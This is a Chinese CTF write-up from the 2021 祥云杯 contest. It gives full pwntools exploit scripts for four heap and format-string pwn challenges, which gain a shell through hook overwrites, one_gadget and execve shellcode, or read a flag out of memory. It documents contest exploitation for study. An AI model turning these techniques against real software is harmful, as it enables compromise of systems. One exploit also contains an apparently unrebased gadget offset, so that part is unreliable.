2021祥云杯 pwn wp


 前言:题都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道题,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下

note:
思路:自己构建格式化字符串漏洞并加以利用,先打 IO stdout 泄露 libc 基地址,再把 realloc_hook 改成 one_gadget,然后进行申请触发 hook 获取 rce
exp:

#coding:utf-8
from pwn import *
# Python 2 / pwntools script (print statement and raw_input appear below).
# Every hard-coded offset further down is tied to the libc-2.23 build loaded here.
context.log_level = "debug"
p = process("./note")  # local run; the commented remote() line was the contest endpoint
libc = ELF("./libc-2.23.so")
#libc=ELF('/home/roo/桌面/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc.so.6')
#p = remote("47.104.70.90",25315)
elf = ELF("./note")  # loaded but never referenced by the rest of the script
 
def add(size, content):
    """Menu option 1: allocate a note of `size` bytes holding `content`.

    The size goes out as a decimal line and the content on its own line; the
    "addr: " prompt that follows is consumed, but the address printed after
    it is left unread in the stream.
    """
    p.sendlineafter("choice: ", "1")
    p.sendlineafter("size: ", str(size))
    p.sendlineafter("content: ", content)
    p.recvuntil("addr: ")  # sync only; the address itself is not parsed
 
def show():
    """Menu option 3: print the note.

    Whatever follows "content:" is read and discarded.  The script body below
    never calls this helper.
    """
    p.sendlineafter("choice: ", "3")
    p.recvuntil("content:")
    p.recv()  # drain the echoed content so later prompts line up
 
    
    
    
# Local debugging aid (PIE-relative breakpoint); drop it for a remote run.
gdb.attach(p,'$rebase 0x1235')
# Round 1 -- menu option 2 ("say"): per the writeup the input is used as a
# format string.  "%7$s" reads the string behind the 7th variadic slot.
p.recvuntil("choice: ")    
p.sendline("2")
p.recvuntil("say ? ")
p.sendline("%7$s\x00")
 
# Data sent on the following prompt: a stdout _IO_FILE header (flags
# 0xfbad1800 followed by three null qwords), the "stdout" trick the writeup
# uses to make libc print its own pointers.  Where this data is written to
# is not visible from the script -- confirm in gdb.
payload = p64(0xfbad1800) + p64(0)*3
p.sendline(payload)
raw_input()  # manual pause for inspection; blocks unattended runs
 
# Take the first address-looking output (ends in 0x7f) and rebase it.  The
# 0x3c36e0 subtrahend and the 0x4527a one_gadget offset below are specific to
# the libc-2.23 build loaded above and will not transfer to another libc.
libc_base = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00")) -0x3c36e0
malloc_hook = libc_base + libc.sym["__malloc_hook"]
success("libc_base:"+hex(libc_base))
success("malloc_hook:"+hex(malloc_hook))  # logged only; never written to
rce =0x4527a + libc_base
 
realloc = libc_base + libc.sym["realloc"] 
realloc_hook = libc_base + libc.sym["__realloc_hook"]
 
 
# Round 2 -- same format primitive; the format string is padded to exactly
# 8 bytes so the __realloc_hook address sits at the next aligned slot.
payload = "%7$s\x00\x00\x00\x00"+p64(realloc_hook)
p.recvuntil("choice: ")
p.sendline("2")
p.recvuntil("say ? ")
p.sendline(payload)
raw_input()
#gdb.attach(p)
# 16 bytes delivered at the chosen address: the one_gadget address first and
# realloc+6 in the qword right after it (the writeup's "realloc hook" step;
# that adjacent slot is presumably __malloc_hook -- verify with the symbols).
payload = p64(rce) + p64(realloc+6)
p.recvuntil("? ")
p.sendline(payload)
 
# Any allocation now passes through the hook; the size "2" is arbitrary.
p.sendlineafter("choice:","1")
p.sendlineafter("size:","2")
 
p.interactive()

PassWordBox_FreeVersion:
这题的难点就是没有难点。当时找到一个加密,却不知道这玩意怎么用,表现出了菜;后来一个 re 大佬告诉我这道题可以直接泄露,因为异或的是固定值,才明白原来是这样。此外还有 off-by-one,可以构造 chunk overlap,泄露 libc,再把 free_hook 改为 rce 即可。

exp:

#coding:utf8
from pwn import *
sh = process('./pwdFree')  # local run; the commented remote() line was the contest endpoint
#sh = remote('47.104.71.220',38562)
# Symbols come from the host's libc, so the 0x3ebca0 and 0x4f432 constants
# further down are only valid for the exact libc installed on this machine.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
 
def add(index, size, content):
   """Menu 1: store `content` in slot `index` with declared length `size`.

   Slot and length are sent as decimal lines; `content` goes out raw (no
   trailing newline) after the second "Pwd:" prompt, so callers pad it.
   """
   for prompt, answer in (('Choice:', '1'), ('Save:', str(index)), ('Pwd:', str(size))):
      sh.sendlineafter(prompt, answer)
   sh.sendafter('Pwd:', content)
 
def edit(index, content):
   """Menu 2: replace slot `index` with `content` (sent raw).

   No prompt is awaited before the index, so a fixed 0.5 s pause stands in
   for synchronisation before the payload is sent.  The script body below
   never calls this helper.
   """
   sh.sendlineafter('Choice:', '2')
   slot = str(index)
   sh.sendline(slot)
   sleep(0.5)
   sh.send(content)
 
def show(index):
   """Menu 3: ask the program to print slot `index`; the reply is left for the caller."""
   choice, slot = '3', str(index)
   sh.sendlineafter('Choice:', choice)
   sh.sendlineafter('Check:', slot)
 
def delete(index):
   """Menu 4: free slot `index`."""
   for prompt, answer in (('Choice:', '4'), ('Delete:', str(index))):
      sh.sendlineafter(prompt, answer)
 
# Slot 0 with a one-byte password: the 8 bytes echoed after "Save ID:" are
# used below as the XOR key for everything the program stores (the writeup's
# "fixed XOR value"), which is what makes stored data decodable.
add(0,1,'\x00')
sh.recvuntil('Save ID:')
random = u64(sh.recv(8))  # NOTE: shadows the `random` module re-exported by `from pwn import *`
print 'cookie=',hex(random)
# Heap layout: 0xF0 / 0x80 / 0x80 / 0xF0 requests in slots 1-4.
add(1,0xF0,'a'*0xF0) #1
add(2,0x80,'b'*0x80) #2
add(3,0x80,'c'*0x80) #3
add(4,0xF0,'d'*0xF0) #4
 
# Seven 0xF0 chunks allocated, then freed; the count of seven is presumably
# chosen to match the allocator's per-size free-list limit, so that later
# frees take a different path -- confirm against the target libc.  Note the
# content is 0x340 bytes for a 0xF0 request; what the binary does with the
# excess is not visible here.
for i in range(5,12):
   add(i,0xF0,'aaaa'*0xd0)
for i in range(5,12):
   delete(i)
delete(3)
 
# The off-by-one the writeup describes: slot 3 is re-created with 0x88
# requested but 0x89 bytes of content.  The qword at offset 0x80 becomes the
# next chunk's prev_size (0x100+0x90+0x90 = 0x220, i.e. the span of slots
# 1-3; XOR-encoded so it is stored in the clear) and the trailing '\x00'
# overwrites the low byte of the next chunk's size field.  Freeing 1 and
# then 4 merges the region that still contains slot 2 -- the chunk overlap.
add(3,0x88,'b'*0x80 + p64((0x100 + 0x90 + 0x90) ^ random) + '\x00')
delete(1)
delete(4)
for i in range(5,12):
   add(i,0xF0,'a'*0xf0)
add(1,0xF0,'a'*0xF0) #1
# Slot 2 now lies inside the merged free region, so "show" returns allocator
# metadata (XOR-encoded); decode it with the key and rebase.  0x3ebca0 is
# specific to the local libc loaded above.
show(2)
sh.recvuntil('Pwd is: ')
libc_base = (u64(sh.recv(8)) ^ random) - 0x3ebca0
system_addr = libc_base + libc.sym['system']  # computed but unused; the one_gadget below is used instead
free_hook_addr = libc_base + libc.sym['__free_hook']
'''
0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL
 
0x4f432 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL
 
0x10a41c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
  '''
onegdaget=0x4f432  # (sic) one_gadget offset from the table above
# Rebuild slot 3 so the bytes past its own 0x80 of data form a fake chunk
# header (size 0x91) whose forward pointer is __free_hook; the two 0x80
# allocations that follow then receive first that fake chunk and then
# __free_hook itself.  All three values are XOR-encoded so they land in
# memory in the clear.
delete(3)
add(3,0x98,'b'*0x80 + (p64(0 ^ random) + p64(0x91 ^ random) + p64(free_hook_addr ^ random)))
add(20,0x80,p64(0) + 'c'*0x78)
# NOTE(review): unlike system_addr / free_hook_addr, `onegdaget` is not added
# to libc_base here, so a raw offset rather than an absolute address is
# encoded -- inconsistent with the rebasing above; check what actually lands.
add(21,0x80,p64(onegdaget ^ random) + 'd'*0x78)
 
 
# Any free() now goes through __free_hook; slot 11 is simply a live slot.
delete(11)
 
sh.interactive()

JigSaw'sCage :
思路:test 有可执行权限,程序开头有长整型溢出,利用它赋予权限,然后写入 shellcode 执行即可。

exp:

from pwn import *
context.log_level = 'debug'
p = process('./JigSAW')
context.arch = "amd64"  # required so asm() below emits x86-64 code
def add(idx):
    """Menu 1: allocate chunk `idx`."""
    for prompt, answer in (("Choice :", "1"), ("Index? :", str(idx))):
        p.sendlineafter(prompt, answer)
def show(idx):
    """Menu 5: display chunk `idx`; the reply is left for the caller."""
    slot = str(idx)
    p.sendlineafter("Choice :", "5")
    p.sendlineafter("Index? :", slot)
def edit(idx, content):
    """Menu 2: write `content` into chunk `idx`; the bytes are sent raw after "iNput:"."""
    for prompt, answer in (("Choice :", "2"), ("Index? :", str(idx))):
        p.sendlineafter(prompt, answer)
    p.sendafter("iNput:", content)
def free(idx):
    """Menu 3: release chunk `idx`."""
    slot = str(idx)
    p.sendlineafter("Choice :", "3")
    p.sendlineafter("Index? :", slot)
def test(idx):
    """Menu 4 ("test") on chunk `idx`; per the writeup this runs the chunk's contents."""
    for prompt, answer in (("Choice :", "4"), ("Index? :", str(idx))):
        p.sendlineafter(prompt, answer)
# Shellcode split into four pieces, one per chunk.  Every piece but the last
# ends with "add rsp, N / push rsp", which appears to be how control moves
# from one chunk to the next (mechanism per the writeup; not verifiable here).
# The constant in s2 is "/bin/sh\0" as a little-endian qword; s4 is execve
# (rax = 59).
s1 = asm("mov rsp, rdx\nadd rsp, 0x20\npush rsp")
s2 = asm("mov rax, 0x68732f6e69622f\nadd rsp, 0x20\npush rsp")
s3 = asm("push rax\nmov rdi, rsp\nxor rsi, rsi\nadd rsp, 0x28\npush rsp")
s4 = asm("xor rdx, rdx\nmov rax, 59\nsyscall\n")
p.sendlineafter("Name:", "max")
# 0xffffffff+1 == 0x100000000: the integer overflow the writeup mentions --
# presumably a 32-bit count that wraps to zero; the exact check is not visible.
p.sendlineafter("Choice:", str(0xffffffff+1))  # integer overflow in the length/choice value
add(0)
add(1)
add(2)
add(3)
edit(0,s1)
edit(1, s2)
edit(2, s3)
edit(3, s4)
# Menu 4 runs chunk 0 (the writeup notes the chunks are executable).
test(0)
p.interactive()

lemmon:
思路:这题弄麻烦了。用 seccomp 开启了沙箱,于是想到打 SROP,然后读出 flag。但看到别的队有用 edit 任意写 name,再进行栈溢出,把最后几位改成栈上的 flag 地址(这里概率很小,成功率大概 1/2000 多),然后 free 掉,再通过不断申请,申请到 flag 内容并输出 flag。这其实是最好用的方法,但我这里采用了 SROP:由于版本是 libc 2.26,申请 free_hook 时遇到了问题,只能申请到 malloc_hook,所以采用了一个大胆的想法——在 malloc_hook 处构造一个 size 绕过 check,再不断申请即可申请到 free_hook,然后把 free_hook 设为 setcontext,在 free_hook 处布置 rop,赋予权限,打即可得到 flag。

打栈地址的exp:

from pwn import *
def add(idx, name, size, msg):
    """Menu 1: create lemon `idx`.

    `idx` and `size` go out as decimal lines; `name` and `msg` are sent raw
    (no newline), so their exact length is controlled by the caller.
    """
    steps = (
        (p.sendlineafter, ">> ", "1"),
        (p.sendlineafter, "emon: \n", str(idx)),
        (p.sendafter, "emon: \n", name),
        (p.sendlineafter, "emon: \n", str(size)),
        (p.sendafter, "age: \n", msg),
    )
    for send, prompt, value in steps:
        send(prompt, value)
def edit(idx, msg):
    """Menu 4: redraw lemon `idx` with `msg` (sent raw).

    The index is sent with sendafter (no trailing newline) here, unlike
    add() and free(); the prompt strings are reproduced exactly as the
    binary emits them.
    """
    slot = str(idx)
    p.sendlineafter('>>> ', '4')
    p.sendafter("Input the index of your lemon  : \n", slot)
    p.sendafter("Now it's your time to draw and color!\n", msg)
def free(idx):
    """Menu 3: delete lemon `idx`."""
    for prompt, answer in ((">>> ", "3"), ("emon : \n", str(idx))):
        p.sendlineafter(prompt, answer)
# Stack-address variant from the writeup (the low-probability one, not the
# SROP route); Python 2 (print statement below).
p=process('./lemon_pwn')
 
context.log_level = 'debug'
# Intro prompts.  The "first" answer is 0x10 bytes of filler, a 32-bit 0x300
# and a single 0x01 byte -- sized to overrun whatever field follows the
# 16-byte input; the field layout itself is not visible here.
p.sendlineafter('me?\n','yes')
p.sendafter('number: \n','111111')
p.sendafter('first: \n','1'*0x10+p32(0x300)+'\x01')
 
# The program prints an address; only three hex digits (the low 12 bits)
# are read, which is why this variant is probabilistic (the writeup quotes
# roughly 1 in 2000) -- the 2-byte partial overwrite below guesses the rest.
p.recvuntil("0x") 
low = int(p.recv(3),16) 
print hex(low) 
 
# Negative index -> out-of-bounds edit (the "任意写 name" the writeup
# mentions): 0x138 bytes of filler, then a p16 partial overwrite aimed at the
# flag's stack address; 0xe000-0x40 is presumably the guessed delta.
edit(-260, "1"*0x138+p16(low+0xe000-0x40))
# Free the tampered lemon and re-allocate in smaller pieces until the flag
# bytes come back as lemon content (the writeup's "不断的申请" step).
add(0,"A",0x500,"a")
free(0)
add(1, "\x10", 0x10, "a") 
add(0, "\x10", 0x10, "a")
add(0, "\x20", 0x500, "a")
p.interactive()
